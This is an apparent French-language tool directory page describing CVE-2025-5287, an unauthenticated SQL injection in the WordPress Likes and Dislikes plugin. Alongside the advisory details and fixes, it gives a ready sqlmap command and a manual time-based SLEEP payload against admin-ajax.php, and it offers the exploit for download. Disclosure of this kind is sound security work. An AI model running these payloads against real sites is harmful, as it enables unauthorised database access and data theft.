Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5287 — Le plugin WordPress Likes and Dislikes <= 1.0.0 est vulnérable à SQL Injection | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-5287
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-5287

CVE-2025-5287

Le plugin WordPress Likes and Dislikes <= 1.0.0 est vulnérable à SQL Injection

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 Plugin WordPress Likes and Dislikes ≤ 1.0.0 - Injection SQL non authentifiée

🧠 Identifiant CVE : CVE-2025-5287

Découvert par : Khaled_Alenazi (Nxploited)
Publié le : 27 mai 2025


📋 Description

Le plugin Likes and Dislikes pour WordPress est vulnérable à une injection SQL via le paramètre post dans toutes les versions jusqu'à et y compris la 1.0.0.
En raison d'un escaping insuffisant et du manque de requêtes préparées, des attaquants non authentifiés peuvent injecter du SQL brut dans les requêtes backend, entraînant une fuite ou une manipulation des données.


🧬 Détails techniques

  • Paramètre vulnérable : post
  • Type de vulnérabilité : Injection SQL (basée sur booléen et sur le temps)
  • Méthode HTTP : POST
  • Point de terminaison affecté : /wp-admin/admin-ajax.php
  • État du correctif : ❌ Non corrigé
  • Privilèges requis : Aucun (Non authentifié)
  • Score CVSS : 9.3 (Élevé)
  • OWASP Top 10 : A1 - Injection

  • 💥 Exploitation

    ✅ Commande SQLMap (SQLi aveugle basée sur le temps) :

    root@kitploit:~
    sqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
    --data "action=my_likes_dislikes_action&post=1&state=like" \
    --method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
    

    Cette commande confirme le point d'injection et énumère les bases de données en utilisant une technique basée sur le temps.

    🧪 Charge utile POC (Manuelle - basée sur le temps) :

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: nxploit.ddev.site
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    
    action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
    

    🧪 Résumé des preuves

    1. Énumération SQLMap :

      • Détection d'injection SQL aveugle basée sur booléen et aveugle basée sur le temps.
      • Confirmation que le backend est MySQL.
      • Bases de données énumérées : db, test, information_schema.

      Preuve SQLMap

    2. Vérification manuelle avec Burp Suite :

      • Délai de réponse HTTP confirmé via la charge utile temporelle.
      • Délai dépassant 15 secondes, indiquant une injection réelle.

      Preuve Burp Suite


    ⚠️ Risques

    • Sévérité CVSS : 9.3 (Élevé)
    • Cette vulnérabilité peut être utilisée pour extraire des données sensibles sans authentification.

    🔗 Références

    • https://patchstack.com/database/wordpress/plugin/inprosysmedia-likes-dislikes-post/vulnerability/wordpress-likes-and-dislikes-plugin-plugin-1-0-0-unauthenticated-sql-injection-vulnerability
    • https://nvd.nist.gov/vuln/detail/CVE-2025-5287

    🛡️ Recommandations

    • Nettoyer et paramétrer immédiatement l'entrée provenant de post.
    • Utiliser des requêtes préparées.
    • Mettre en place un WAF et une limitation de débit pour réduire les tentatives d'injection par force brute.

    ⚠️ Avertissement

    Ce contenu est fourni à des fins éducatives et de recherche uniquement.
    L'auteur ne cautionne pas les activités malveillantes ou l'exploitation de systèmes sans autorisation explicite.


    👤 Auteur

    Khaled_Alenazi (Nxploited)

    Télécharger l’outil